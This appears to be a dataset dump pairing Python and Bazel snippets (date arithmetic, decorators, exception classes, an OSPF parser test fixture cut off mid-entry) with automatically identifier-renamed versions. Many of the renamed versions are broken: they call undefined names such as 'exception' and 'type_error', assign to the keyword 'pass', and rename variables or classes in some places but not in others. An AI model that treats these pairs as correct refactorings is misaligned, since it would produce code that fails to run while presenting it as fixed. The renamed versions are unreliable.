content stringlengths 7 1.05M | fixed_cases stringlengths 1 1.28M |
|---|---|
class Constants:
LOGGER_NAME = "log4sdc-common"
LOGGER_LOG_LEVEL_ENV_VAR = "LOG_LEVEL"
LOGGER_DEFAULT_LOG_LEVEL = "WARN"
def __setattr__(self, attr, value):
if hasattr(self, attr):
raise Exception("Attempting to alter read-only value")
self.__dict__[attr] = value
| class Constants:
logger_name = 'log4sdc-common'
logger_log_level_env_var = 'LOG_LEVEL'
logger_default_log_level = 'WARN'
def __setattr__(self, attr, value):
if hasattr(self, attr):
raise exception('Attempting to alter read-only value')
self.__dict__[attr] = value |
class Solution:
def leap_year(self, year):
return ((year % 400 == 0) or (year % 100 != 0 and year % 4 == 0))
def date_to_int(self, year, month, day):
month_length = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
ans = day - 1
while month != 0:
month -= 1
ans += month_length[month]
if month == 2 and self.leap_year(year):
ans += 1
ans += 365 * (year - 1971)
ans += (year - 1) // 4 - 1971 // 4
ans -= (year - 1) // 100 - 1971 // 100
ans += (year - 1) // 400 - 1971 // 400
return ans
def daysBetweenDates(self, date1: str, date2: str) -> int:
date1 = [int(i) for i in date1.split('-')]
date2 = [int(i) for i in date2.split('-')]
return abs(self.date_to_int(*date1) - self.date_to_int(*date2))
| class Solution:
def leap_year(self, year):
return year % 400 == 0 or (year % 100 != 0 and year % 4 == 0)
def date_to_int(self, year, month, day):
month_length = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
ans = day - 1
while month != 0:
month -= 1
ans += month_length[month]
if month == 2 and self.leap_year(year):
ans += 1
ans += 365 * (year - 1971)
ans += (year - 1) // 4 - 1971 // 4
ans -= (year - 1) // 100 - 1971 // 100
ans += (year - 1) // 400 - 1971 // 400
return ans
def days_between_dates(self, date1: str, date2: str) -> int:
date1 = [int(i) for i in date1.split('-')]
date2 = [int(i) for i in date2.split('-')]
return abs(self.date_to_int(*date1) - self.date_to_int(*date2)) |
N,B,H,W =map(int,input().split())
ans = 9876543210
for i in range(H):
p = int(input())
L = list(map(int,input().split()))
for i in L:
if i >=N:
if p*N <= B and p*N < ans:
ans = p*N
if ans == 9876543210:
print("stay home")
else:
print(ans) | (n, b, h, w) = map(int, input().split())
ans = 9876543210
for i in range(H):
p = int(input())
l = list(map(int, input().split()))
for i in L:
if i >= N:
if p * N <= B and p * N < ans:
ans = p * N
if ans == 9876543210:
print('stay home')
else:
print(ans) |
# decorator function
def mymypy(types):
def wrap(func):
def inner(*args):
for t, a in zip(types, args):
if not isinstance(a, t):
raise TypeError(f'Argument: {a} is not type {t}')
return func(*args)
return inner
return wrap
# --- testing ---
@mymypy([float, int])
def mul(a, b):
return a * b
try:
print(f'mul result: {mul(2.5, 3)}')
print(f'mul result: {mul(4, 2)}')
except TypeError as e:
print(e)
class MyClass:
def __init__(self, x):
self.x = x
@mymypy([int, MyClass, int])
def objtest(a, b, c):
return a * b.x - c
mc = MyClass(5)
try:
print(f'objtest result: {objtest(2, mc, 1)}')
print(f'objtest result: {objtest(2, "k", 1)}')
except TypeError as e:
print(e)
| def mymypy(types):
def wrap(func):
def inner(*args):
for (t, a) in zip(types, args):
if not isinstance(a, t):
raise type_error(f'Argument: {a} is not type {t}')
return func(*args)
return inner
return wrap
@mymypy([float, int])
def mul(a, b):
return a * b
try:
print(f'mul result: {mul(2.5, 3)}')
print(f'mul result: {mul(4, 2)}')
except TypeError as e:
print(e)
class Myclass:
def __init__(self, x):
self.x = x
@mymypy([int, MyClass, int])
def objtest(a, b, c):
return a * b.x - c
mc = my_class(5)
try:
print(f'objtest result: {objtest(2, mc, 1)}')
print(f"objtest result: {objtest(2, 'k', 1)}")
except TypeError as e:
print(e) |
# Data directories
train_data_path = "./finished_files/chunked/train_*.json"
eval_data_path = "./finished_files/val.json"
decode_data_path = "./finished_files/test.json"
vocab_path = "./finished_files/vocab"
log_root = "./log"
# Hyperparameters
hidden_dim = 256
emb_dim = 128
batch_size = 8
max_enc_steps = 400
max_dec_steps = 100
beam_size = 4
min_dec_steps = 35
vocab_size = 50000
lr = 0.15
adagrad_init_acc = 0.1
rand_unif_init_mag = 0.02
trunc_norm_init_std = 1e-4
max_grad_norm = 2.0
pointer_gen = True
is_coverage = True
cov_loss_wt = 1.0
eps = 1e-12
max_iterations = 100000
lr_coverage = 0.15
| train_data_path = './finished_files/chunked/train_*.json'
eval_data_path = './finished_files/val.json'
decode_data_path = './finished_files/test.json'
vocab_path = './finished_files/vocab'
log_root = './log'
hidden_dim = 256
emb_dim = 128
batch_size = 8
max_enc_steps = 400
max_dec_steps = 100
beam_size = 4
min_dec_steps = 35
vocab_size = 50000
lr = 0.15
adagrad_init_acc = 0.1
rand_unif_init_mag = 0.02
trunc_norm_init_std = 0.0001
max_grad_norm = 2.0
pointer_gen = True
is_coverage = True
cov_loss_wt = 1.0
eps = 1e-12
max_iterations = 100000
lr_coverage = 0.15 |
class BaseProfileVisualizer:
def __init__(self, framework=None, visualizer=None):
self.framework = framework
self.visualizer = visualizer
self.profiles = []
def set_profiles(self, profiles):
""""""
if len(profiles) <= 1:
self.profiles = [profiles]
else:
self.profiles = profiles
self.visualizer._init_data_preprocessing(profiles)
def plot_distribution(self, variable, **kwargs):
"""Plots a distribution chart."""
return self.visualizer.plot_distribution(variable, **kwargs)
def plot_missing_values(self, variable, **kwargs):
"""Plots a Missing Value to Total Count ratio chart."""
return self.visualizer.plot_missing_values(variable, **kwargs)
def plot_uniqueness(self, variable, **kwargs):
"""Plots a Estimated Unique Values chart."""
return self.visualizer.plot_uniqueness(variable, **kwargs)
def plot_data_types(self, variable, **kwargs):
"""Plots a Inferred Data Types chart."""
return self.visualizer.plot_data_types(variable, **kwargs)
def plot_string_length(self, variable, **kwargs):
"""Plots string length data ."""
return self.visualizer.plot_string_length(variable, **kwargs)
def plot_token_length(self, variable, character_list, **kwargs):
"""Plots token length data ."""
return self.visualizer.plot_token_length(variable, **kwargs)
def plot_char_pos(self, variable, character_list, **kwargs):
"""Plots character position data ."""
return self.visualizer.plot_char_pos(variable, character_list=character_list, **kwargs)
def plot_string(self, variable, character_list, **kwargs):
"""Plots string related data ."""
return self.visualizer.plot_string(variable, character_list=character_list, **kwargs)
def available_plots(self):
"""Returns available plots for selected framework."""
return self.visualizer.available_plots()
| class Baseprofilevisualizer:
def __init__(self, framework=None, visualizer=None):
self.framework = framework
self.visualizer = visualizer
self.profiles = []
def set_profiles(self, profiles):
""""""
if len(profiles) <= 1:
self.profiles = [profiles]
else:
self.profiles = profiles
self.visualizer._init_data_preprocessing(profiles)
def plot_distribution(self, variable, **kwargs):
"""Plots a distribution chart."""
return self.visualizer.plot_distribution(variable, **kwargs)
def plot_missing_values(self, variable, **kwargs):
"""Plots a Missing Value to Total Count ratio chart."""
return self.visualizer.plot_missing_values(variable, **kwargs)
def plot_uniqueness(self, variable, **kwargs):
"""Plots a Estimated Unique Values chart."""
return self.visualizer.plot_uniqueness(variable, **kwargs)
def plot_data_types(self, variable, **kwargs):
"""Plots a Inferred Data Types chart."""
return self.visualizer.plot_data_types(variable, **kwargs)
def plot_string_length(self, variable, **kwargs):
"""Plots string length data ."""
return self.visualizer.plot_string_length(variable, **kwargs)
def plot_token_length(self, variable, character_list, **kwargs):
"""Plots token length data ."""
return self.visualizer.plot_token_length(variable, **kwargs)
def plot_char_pos(self, variable, character_list, **kwargs):
"""Plots character position data ."""
return self.visualizer.plot_char_pos(variable, character_list=character_list, **kwargs)
def plot_string(self, variable, character_list, **kwargs):
"""Plots string related data ."""
return self.visualizer.plot_string(variable, character_list=character_list, **kwargs)
def available_plots(self):
"""Returns available plots for selected framework."""
return self.visualizer.available_plots() |
# Give yourself a nice cheer -
# print out Go Whateveryournameis!
print( )
# Did you get an error?
# Remember that you need to wrap something around text...
| print() |
def select_tower(tower_selected, tower):
if tower_selected:
move_disk(tower_selected, tower)
return None
else:
return tower
def move_disk(from_tower, to_tower):
disk = from_tower.pop()
if not disk:
return False
if can_move(disk, to_tower):
to_tower.append(disk)
else:
from_tower.append(disk)
def can_move(disk, into_tower):
if len(into_tower) == 0:
return True
last = into_tower[-1]
if disk.get_width() < last.get_width():
return True
return False
| def select_tower(tower_selected, tower):
if tower_selected:
move_disk(tower_selected, tower)
return None
else:
return tower
def move_disk(from_tower, to_tower):
disk = from_tower.pop()
if not disk:
return False
if can_move(disk, to_tower):
to_tower.append(disk)
else:
from_tower.append(disk)
def can_move(disk, into_tower):
if len(into_tower) == 0:
return True
last = into_tower[-1]
if disk.get_width() < last.get_width():
return True
return False |
def dedupe_and_sort(sequence, first=None, last=None):
"""
De-dupe and partially sort a sequence.
The `first` argument should contain all the items that might appear in
`sequence` and for which the order (relative to each other) is important.
The `last` argument is the same, but matching items will be placed at the
end of the sequence.
For example, `INSTALLED_APPS` and `MIDDLEWARE_CLASSES` settings.
Items from `first` will only be included if they also appear in `sequence`.
Items from `sequence` that don't appear in `first` will come
after any that do, and retain their existing order.
Returns a sequence of the same type as given.
"""
first = first or []
last = last or []
# Add items that should be sorted first.
new_sequence = [i for i in first if i in sequence]
# Add remaining items in their current order, ignoring duplicates and items
# that should be sorted last.
for item in sequence:
if item not in new_sequence and item not in last:
new_sequence.append(item)
# Add items that should be sorted last.
new_sequence.extend([i for i in last if i in sequence])
# Return a sequence of the same type as given.
return type(sequence)(new_sequence)
def _apply_slice(sequence, start, end):
return sequence[start:end]
def slice_sequences(sequences, start, end, apply_slice=None):
"""
Performs a slice across multiple sequences.
Useful when paginating across chained collections.
:param sequences: an iterable of iterables, each nested iterable should contain
a sequence and its size
:param start: starting index to apply the slice from
:param end: index that the slice should end at
:param apply_slice: function that takes the sequence and start/end offsets, and
returns the sliced sequence
:return: a list of the items sliced from the sequences
"""
if start < 0 or end < 0 or end <= start:
raise ValueError('Start and/or End out of range. Start: %s. End: %s' % (start, end))
items_to_take = end - start
items_passed = 0
collected_items = []
if apply_slice is None:
apply_slice = _apply_slice
for sequence, count in sequences:
offset_start = start - items_passed
offset_end = end - items_passed
if items_passed == start:
items = apply_slice(sequence, 0, items_to_take)
elif 0 < offset_start < count:
items = apply_slice(sequence, offset_start, offset_end)
elif offset_start < 0:
items = apply_slice(sequence, 0, offset_end)
else:
items = []
items = list(items)
collected_items += items
items_to_take -= len(items)
items_passed += count
if items_passed > end or items_to_take == 0:
break
return collected_items
| def dedupe_and_sort(sequence, first=None, last=None):
"""
De-dupe and partially sort a sequence.
The `first` argument should contain all the items that might appear in
`sequence` and for which the order (relative to each other) is important.
The `last` argument is the same, but matching items will be placed at the
end of the sequence.
For example, `INSTALLED_APPS` and `MIDDLEWARE_CLASSES` settings.
Items from `first` will only be included if they also appear in `sequence`.
Items from `sequence` that don't appear in `first` will come
after any that do, and retain their existing order.
Returns a sequence of the same type as given.
"""
first = first or []
last = last or []
new_sequence = [i for i in first if i in sequence]
for item in sequence:
if item not in new_sequence and item not in last:
new_sequence.append(item)
new_sequence.extend([i for i in last if i in sequence])
return type(sequence)(new_sequence)
def _apply_slice(sequence, start, end):
return sequence[start:end]
def slice_sequences(sequences, start, end, apply_slice=None):
"""
Performs a slice across multiple sequences.
Useful when paginating across chained collections.
:param sequences: an iterable of iterables, each nested iterable should contain
a sequence and its size
:param start: starting index to apply the slice from
:param end: index that the slice should end at
:param apply_slice: function that takes the sequence and start/end offsets, and
returns the sliced sequence
:return: a list of the items sliced from the sequences
"""
if start < 0 or end < 0 or end <= start:
raise value_error('Start and/or End out of range. Start: %s. End: %s' % (start, end))
items_to_take = end - start
items_passed = 0
collected_items = []
if apply_slice is None:
apply_slice = _apply_slice
for (sequence, count) in sequences:
offset_start = start - items_passed
offset_end = end - items_passed
if items_passed == start:
items = apply_slice(sequence, 0, items_to_take)
elif 0 < offset_start < count:
items = apply_slice(sequence, offset_start, offset_end)
elif offset_start < 0:
items = apply_slice(sequence, 0, offset_end)
else:
items = []
items = list(items)
collected_items += items
items_to_take -= len(items)
items_passed += count
if items_passed > end or items_to_take == 0:
break
return collected_items |
class OTRSException(Exception):
pass
class HTTPMethodNotSupportedError(OTRSException):
pass
class OTRSBadResponse(OTRSException):
pass
class AuthError(OTRSException):
pass
class AccessDeniedError(OTRSException):
pass
class InvalidParameterError(OTRSException):
pass
class ArgumentMissingError(Exception):
pass
class ArgumentInvalidError(Exception):
pass
class InvalidInitArgument(Exception):
pass
class InvalidSessionCacheFile(Exception):
pass
class InvalidTicketGetArgument(Exception):
pass
class InvalidTicketCreateArgument(Exception):
pass
class InvalidTicketUpdateArgument(Exception):
pass
| class Otrsexception(Exception):
pass
class Httpmethodnotsupportederror(OTRSException):
pass
class Otrsbadresponse(OTRSException):
pass
class Autherror(OTRSException):
pass
class Accessdeniederror(OTRSException):
pass
class Invalidparametererror(OTRSException):
pass
class Argumentmissingerror(Exception):
pass
class Argumentinvaliderror(Exception):
pass
class Invalidinitargument(Exception):
pass
class Invalidsessioncachefile(Exception):
pass
class Invalidticketgetargument(Exception):
pass
class Invalidticketcreateargument(Exception):
pass
class Invalidticketupdateargument(Exception):
pass |
# cmdline: -O
# test optimisation output
print(__debug__)
assert 0
| print(__debug__)
assert 0 |
HOST = 'nhc2.local'
USER = 'username'
PASS = 'password'
# For hobby API 8884
PORT = 8883 | host = 'nhc2.local'
user = 'username'
pass = 'password'
port = 8883 |
"""Bind all submodules needed for eventuals."""
load("@com_github_3rdparty_eventuals//bazel:submodule_repository.bzl", "submodule_repository")
def submodules(external):
"""Creates repositories for each submodule.
Args:
external: whether or not we're invoking this function as though
though we're an external dependency
"""
submodule_repository(
name = "com_github_reboot_dev_pyprotoc_plugin",
path = "submodules/pyprotoc-plugin",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout_atomic_backoff",
path = "submodules/stout/stout-atomic-backoff",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout_stateful_tally",
path = "submodules/stout/stout-stateful-tally",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout_borrowed_ptr",
path = "submodules/stout/stout-borrowed-ptr",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout_flags",
path = "submodules/stout/stout-flags",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout_notification",
path = "submodules/stout/stout-notification",
external = external,
)
submodule_repository(
name = "com_github_3rdparty_stout",
path = "submodules/stout",
external = external,
)
| """Bind all submodules needed for eventuals."""
load('@com_github_3rdparty_eventuals//bazel:submodule_repository.bzl', 'submodule_repository')
def submodules(external):
"""Creates repositories for each submodule.
Args:
external: whether or not we're invoking this function as though
though we're an external dependency
"""
submodule_repository(name='com_github_reboot_dev_pyprotoc_plugin', path='submodules/pyprotoc-plugin', external=external)
submodule_repository(name='com_github_3rdparty_stout_atomic_backoff', path='submodules/stout/stout-atomic-backoff', external=external)
submodule_repository(name='com_github_3rdparty_stout_stateful_tally', path='submodules/stout/stout-stateful-tally', external=external)
submodule_repository(name='com_github_3rdparty_stout_borrowed_ptr', path='submodules/stout/stout-borrowed-ptr', external=external)
submodule_repository(name='com_github_3rdparty_stout_flags', path='submodules/stout/stout-flags', external=external)
submodule_repository(name='com_github_3rdparty_stout_notification', path='submodules/stout/stout-notification', external=external)
submodule_repository(name='com_github_3rdparty_stout', path='submodules/stout', external=external) |
# Copyright 2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
incompatible_arcs = {
('100', '7'): ['Ampere', 'Fermi'],
('102', '7'): ['Ampere', 'Fermi'],
('102', '8'): ['Ampere', 'Fermi'],
('110', '8'): ['Fermi'],
}
gpu_compute_capability_to_arc = {
8: 'Ampere',
(7, 5): 'Turing',
(7, 0): 'Volta',
(7, 2): 'Volta',
6: 'Pascal',
5: 'Maxwell',
3: 'Kepler',
2: 'Fermi'
}
| incompatible_arcs = {('100', '7'): ['Ampere', 'Fermi'], ('102', '7'): ['Ampere', 'Fermi'], ('102', '8'): ['Ampere', 'Fermi'], ('110', '8'): ['Fermi']}
gpu_compute_capability_to_arc = {8: 'Ampere', (7, 5): 'Turing', (7, 0): 'Volta', (7, 2): 'Volta', 6: 'Pascal', 5: 'Maxwell', 3: 'Kepler', 2: 'Fermi'} |
api_key = ''
api_secret = ''
# number of seconds before bittrex request timesout
timeout = 5 | api_key = ''
api_secret = ''
timeout = 5 |
expected_output = {
'vrf':
{'default':
{'address_family':
{'ipv4':
{'instance':
{'1':
{'areas':
{'0.0.0.0':
{'database':
{'lsa_types':
{10:
{'lsa_type': 10,
'lsas':
{'10.1.0.0 192.168.4.1':
{'adv_router': '192.168.4.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.4.1',
'age': 720,
'checksum': '0x8c2b',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.4.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.154.1',
'age': 720,
'checksum': '0x8e27',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.154.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.51.1',
'age': 515,
'checksum': '0x9023',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.51.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.0 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.0.0',
'ospfv2':
{'body':
{'opaque': {}},
'header':
{'adv_router': '192.168.205.1',
'age': 497,
'checksum': '0x921f',
'fragment_number': 0,
'length': 28,
'lsa_id': '10.1.0.0',
'mpls_te_router_id': '192.168.205.1',
'num_links': 0,
'opaque_id': 0,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.233 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.233',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.145.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.145.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.51.1',
'age': 475,
'checksum': '0x9a3b',
'fragment_number': 233,
'length': 116,
'lsa_id': '10.1.0.233',
'num_links': 1,
'opaque_id': 233,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.237 192.168.51.1':
{'adv_router': '192.168.51.1',
'lsa_id': '10.1.0.237',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.81.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.81.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.51.1',
'age': 455,
'checksum': '0x7c40',
'fragment_number': 237,
'length': 116,
'lsa_id': '10.1.0.237',
'num_links': 1,
'opaque_id': 237,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.42 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.42',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.196.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.196.2': {}},
'max_bandwidth': 2500000000,
'max_reservable_bandwidth': 1874999936,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 2,
'unreserved_bandwidths':
{'0 1874999936':
{'priority': 0,
'unreserved_bandwidth': 1874999936},
'1 1874999936':
{'priority': 1,
'unreserved_bandwidth': 1874999936},
'2 1874999936':
{'priority': 2,
'unreserved_bandwidth': 1874999936},
'3 1874999936':
{'priority': 3,
'unreserved_bandwidth': 1874999936},
'4 1874999936':
{'priority': 4,
'unreserved_bandwidth': 1874999936},
'5 1874999936':
{'priority': 5,
'unreserved_bandwidth': 1874999936},
'6 1874999936':
{'priority': 6,
'unreserved_bandwidth': 1874999936},
'7 1874999936':
{'priority': 7,
'unreserved_bandwidth': 1874999936}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 510,
'checksum': '0xcce3',
'fragment_number': 42,
'length': 116,
'lsa_id': '10.1.0.42',
'num_links': 1,
'opaque_id': 42,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.47 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.47',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.145.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.145.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 470,
'checksum': '0xcec3',
'fragment_number': 47,
'length': 116,
'lsa_id': '10.1.0.47',
'num_links': 1,
'opaque_id': 47,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.51 192.168.154.1':
{'adv_router': '192.168.154.1',
'lsa_id': '10.1.0.51',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.106.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.106.1': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.154.1',
'age': 450,
'checksum': '0xd8b3',
'fragment_number': 51,
'length': 116,
'lsa_id': '10.1.0.51',
'num_links': 1,
'opaque_id': 51,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.0.55 192.168.4.1':
{'adv_router': '192.168.4.1',
'lsa_id': '10.1.0.55',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.196.2',
'link_name': 'broadcast network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.196.1': {}},
'max_bandwidth': 2500000000,
'max_reservable_bandwidth': 1874999936,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 2,
'unreserved_bandwidths':
{'0 1874999936':
{'priority': 0,
'unreserved_bandwidth': 1874999936},
'1 1874999936':
{'priority': 1,
'unreserved_bandwidth': 1874999936},
'2 1874999936':
{'priority': 2,
'unreserved_bandwidth': 1874999936},
'3 1874999936':
{'priority': 3,
'unreserved_bandwidth': 1874999936},
'4 1874999936':
{'priority': 4,
'unreserved_bandwidth': 1874999936},
'5 1874999936':
{'priority': 5,
'unreserved_bandwidth': 1874999936},
'6 1874999936':
{'priority': 6,
'unreserved_bandwidth': 1874999936},
'7 1874999936':
{'priority': 7,
'unreserved_bandwidth': 1874999936}}}}}},
'header':
{'adv_router': '192.168.4.1',
'age': 510,
'checksum': '0x3372',
'fragment_number': 55,
'length': 116,
'lsa_id': '10.1.0.55',
'num_links': 1,
'opaque_id': 55,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.1.11 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.1.11',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1:
{'admin_group': '0x0',
'link_id': '192.168.81.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.81.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
'unreserved_bandwidth': 3749999872},
'6 3749999872':
{'priority': 6,
'unreserved_bandwidth': 3749999872},
'7 3749999872':
{'priority': 7,
'unreserved_bandwidth': 3749999872}}}}}},
'header':
{'adv_router': '192.168.205.1',
'age': 447,
'checksum': '0x6537',
'fragment_number': 267,
'length': 116,
'lsa_id': '10.1.1.11',
'num_links': 1,
'opaque_id': 267,
'opaque_type': 1,
'option': '0x2',
'option_desc': 'No TOS-capability, No DC',
'seq_num': '0x80000002',
'type': 10}}},
'10.1.1.15 192.168.205.1':
{'adv_router': '192.168.205.1',
'lsa_id': '10.1.1.15',
'ospfv2':
{'body':
{'opaque':
{'link_tlvs':
{1: {'admin_group': '0x0',
'link_id': '192.168.106.2',
'link_name': 'broadcast '
'network',
'link_type': 2,
'local_if_ipv4_addrs':
{'192.168.106.2': {}},
'max_bandwidth': 5000000000,
'max_reservable_bandwidth': 3749999872,
'remote_if_ipv4_addrs':
{'0.0.0.0': {}},
'te_metric': 1,
'unreserved_bandwidths':
{'0 3749999872':
{'priority': 0,
'unreserved_bandwidth': 3749999872},
'1 3749999872':
{'priority': 1,
'unreserved_bandwidth': 3749999872},
'2 3749999872':
{'priority': 2,
'unreserved_bandwidth': 3749999872},
'3 3749999872':
{'priority': 3,
'unreserved_bandwidth': 3749999872},
'4 3749999872':
{'priority': 4,
'unreserved_bandwidth': 3749999872},
'5 3749999872':
{'priority': 5,
